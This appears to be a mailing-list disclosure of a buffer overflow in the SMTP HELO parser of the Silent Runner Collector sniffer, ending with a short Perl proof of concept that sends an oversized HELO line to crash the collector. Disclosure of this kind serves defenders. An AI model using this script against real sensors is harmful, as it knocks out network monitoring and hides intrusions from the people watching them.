Hello,

Silent Runner Collector (SRC) has a buffer overflow condition in the
routines
that parse SMTP traffic.  SRC is the "sniffer" conponent of the Silent
Runner
network traffic analysis suite.  The overflow was  noticed in SRC v1.6.1
but is
likely present in other versions as well.  The actual buffer in
question  holds the
SMTP HELO line.  The overflow occurs when a HELO command in excess of
4096 bytes transits a network segment that the collector is monitoring.
This
vulnerability can be exploited by an intruder to crash the collector and
thus stop
the monitoring of transiting network traffic.  I'm not sure if this bug
can be
exploited in such a way as to allow for the execution of code on the
sensor.
Maybe someone else has some insight into the possibilities for
arbitrary code
execution?

Jack



#!/usr/bin/perl
# This is a simple script that demonstrates the
# SRC HELO overflow vulnerability.  It will result
# in a crashed silent runner collector so please do
# not use it on production networks.  It is intended
# for demonstration purposes only.

use IO::Socket;

$remote_host = '192.168.111.3';
$remote_port = 25;

$buf = 'A' x 4092;

$socket = IO::Socket::INET->new(PeerAddr => $remote_host,

PeerPort => $remote_port,

Proto    => "tcp",

Type     => SOCK_STREAM)
or die "Can't connect to $remote_host:$remote_port : $@\n";

# 'HELO ' + $buf  = 4097 bytes ( 1 byte too much)
print $socket "HELO $buf";

exit;

Reply via email to